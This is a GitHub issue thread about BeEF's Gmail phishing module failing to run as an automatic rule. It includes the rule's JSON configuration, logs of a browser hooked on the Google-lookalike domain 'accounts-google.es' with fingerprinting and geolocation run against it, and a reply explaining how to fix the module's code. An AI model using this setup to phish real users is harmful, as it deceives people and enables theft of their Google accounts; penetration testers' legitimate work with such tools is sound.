Google Phishing module doesn't execute properly as an ARE Rule
jme418 opened this issue · 3 comments
First Steps
BeEF Version: 0.5.4.0
Ruby Version: ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [x86_64-linux-gnu]
Browser Details (e.g. Chrome v81.0): Causing problems with all I've tried (FF - 115.8.0esr, O - 108.0.5067.29, C - 123.0.6312.86, 123.0.6312.58, 121.0.6167.178)
Operating System: Linux, Windows and Android
Configuration
- Have you made any changes to your BeEF configuration? Yes.
- Have you enabled or disabled any BeEF extensions? Yes, Metasploit one but I do not remember if anyone else, I've been using BeEF for a while.
Steps to Reproduce
- Creation of beef/arerules/enabled/gmail_phishing.json
{
"name": "Google Phishing",
"author": "jking",
"modules": [
{
"name": "gmail_phishing",
"condition": null,
"code": null,
"options": {
"xss_hook_url": "https://myaccount.google.com/",
"logout_gmail_interval": 10000,
"wait_seconds_before_redirect": 1000
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
- Starting of beef and loading of the arerules.
msf6 > sudo ./beef -x
[*] exec: sudo ./beef -x
...
[22:46:45][*] [ARE] Ruleset (Fingerprint Browser) parsed and stored successfully.
[22:46:45][*] [ARE] Ruleset (Get Geolocation HTML5 (jking)) parsed and stored successfully.
[22:46:45][*] [ARE] Ruleset (Google Phishing) parsed and stored successfully.
[22:46:45][*] BeEF server started (press control+c to stop)
[22:47:27][!] [Browser Details] Invalid browser name returned from the hook browser's initial connection.
[22:47:27][!] [Browser Details] Invalid browser version returned from the hook browser's initial connection.
[22:47:27][*] New Hooked Browser [id:1, ip:87.223.76.77, browser:UNKNOWN-124.0.0.0, os:Windows-10], hooked domain [[accounts-google.es:443](http://accounts-google.es:443/)]
[22:47:27][*] [ARE] Checking if any defined rules should be triggered on target.
[22:47:27] |_ Hooked browser and OS match rule: Fingerprint Browser.
[22:47:27] |_ Hooked browser and OS match rule: Get Geolocation HTML5 (jking).
[22:47:27] |_ Hooked browser and OS match rule: Google Phishing.
[22:47:27] |_ Found [3/3] ARE rules matching the hooked browser.
[22:47:27] |_ Preparing JS for command id [1], module [fingerprint_browser]
[22:47:27] |_ Triggering rules [1, 2, 3] on HB 1
[22:47:28] |_ Preparing JS for command id [2], module [get_geolocation_html5_jking]
[22:47:28] |_ Triggering rules [1, 2, 3] on HB 1
[22:47:28] |_ Preparing JS for command id [3], module [gmail_phishing]
[22:47:28] |_ Triggering rules [1, 2, 3] on HB 1
[22:47:30][*] Hooked browser [id:1, ip:87.223.76.77] has executed instructions (status: SUCCESS) from command module [cid:2, mod: 290, name:'Get Geolocation HTML5 (jking)']
[22:47:30][*] Hooked browser [id:1, ip:87.223.76.77] has executed instructions (status: SUCCESS) from command module [cid:1, mod: 291, name:'Fingerprint Browser']
- Hooked host view is empty and panel shows that command has been executed???
- Re-executing the command it shows properly.
Any clue about what is happening here? Thanks.
This issue as been marked as stale due to inactivity and will be closed in 7 days
Thank you @jme418. We'll add to our backlog.
Thank you @jme418. We'll add to our backlog.
Hi there! I got the solution a few hours ago. It's simple: all the functions visible in the command.js file must be placed within beef.execute(function(){/* code here */}). So, instead of separate calls to logoutGoogle(), displayingPhisingSite()... the associated code for those functions must take place within this function block.